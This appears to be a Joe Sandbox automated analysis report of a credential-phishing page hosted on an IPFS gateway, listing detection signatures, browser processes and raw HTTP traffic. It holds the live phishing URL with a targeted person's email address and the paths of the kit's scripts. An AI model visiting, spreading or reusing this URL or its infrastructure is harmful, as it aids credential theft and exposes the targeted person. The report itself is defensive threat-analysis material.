Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.com

Overview

General Information

Sample URL:https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.com
Analysis ID:1546395
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish10
Yara detected HtmlPhish44
Uses IPFS gateway to access IPFS content in browser (often used in phishing/scams)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML title does not match URL
URL contains potential PII (phishing indication)

Classification

  • System is w10x64
  • chrome.exe (PID: 3332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2416 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2076,i,5621221756577242458,7014284374741819107,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_116JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

        Phishing

        barindex
        Source: Yara matchFile source: 1.1.pages.csv, type: HTML
        Source: Yara matchFile source: 1.2.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_116, type: DROPPED
        Source: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comHTTP Parser: Gateway: dweb.link
        Source: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.linkHTTP Parser: Gateway: dweb.link
        Source: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comHTTP Parser: Number of links: 0
        Source: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comHTTP Parser: Title: virtualintelligencebriefing does not match URL
        Source: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comSample URL: PII: sean@virtualintelligencebriefing.com
        Source: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comHTTP Parser: <input type="password" .../> found
        Source: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comHTTP Parser: No <meta name="author".. found
        Source: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comHTTP Parser: No <meta name="author".. found
        Source: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comHTTP Parser: No <meta name="copyright".. found
        Source: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.comHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49751 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:52322 version: TLS 1.2
        Source: global trafficTCP traffic: 192.168.2.4:52319 -> 1.1.1.1:53
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /img/bg-image.jpg HTTP/1.1Host: bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.linkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bootstrap/4.5.2/css/bootstrap.min.css HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /b1268/s/js/mesg_en.js HTTP/1.1Host: d12y7sg0iam4lc.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /b1268/s/js/pack.min.js HTTP/1.1Host: d12y7sg0iam4lc.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /b1268/s/js/authen.min.js HTTP/1.1Host: d12y7sg0iam4lc.cloudfront.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /s2/favicons?domain=virtualintelligencebriefing.com HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /get/65490-1671030344805-37a36e07674665dbe1105f1044aab44d/width/1200/https://virtualintelligencebriefing.com HTTP/1.1Host: image.thum.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /s2/favicons?domain= HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
        Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
